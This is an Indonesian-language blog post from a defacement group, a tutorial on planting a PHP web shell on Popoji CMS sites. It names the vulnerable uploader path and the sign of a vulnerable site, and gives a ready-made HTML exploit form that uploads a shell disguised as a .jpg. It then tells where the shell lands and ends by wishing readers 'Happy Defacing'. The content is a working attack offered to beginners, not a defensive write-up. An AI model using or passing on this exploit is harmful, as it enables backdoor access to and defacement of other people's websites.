Kali ini Guee bakal Share Tutorial Cara Upload Shell di CMS Popoji , uihh :v akhirnye dah bisa upload shell wkwk <(")
ya riset upload shell ini gua dapet dari indoXploit *uihh galak inii para sesepuh, ngerisetnye ampe jozz >3<"
Sebelumnye Baca ini dulu: Deface Website berbasis CMS Popoji Lewat Register Account
okeii kita akan bahas disini, bagaimana meng-upload sebuah backdoor di POPOJI CMS
Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin
kalo dah Login, langsung buka URL bug/vuln di:
target.c0li/po-admin/js/plugins/uploader/upload.php
Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee |
<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>
* save dgn ekstensi .html
* lalu bukak dengan browser kalean.
upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.
jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali. |
Terus cara tau Letak Shell nye Piye Om o.O ??
buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..
akses shell:
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php
Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji
Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih
Source and Thanks to: indoXploit
./Nuenomaru
Kami ada dan Berkarya, bukan utk disanjungi kok ^_^ |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
0 komentar:
Posting Komentar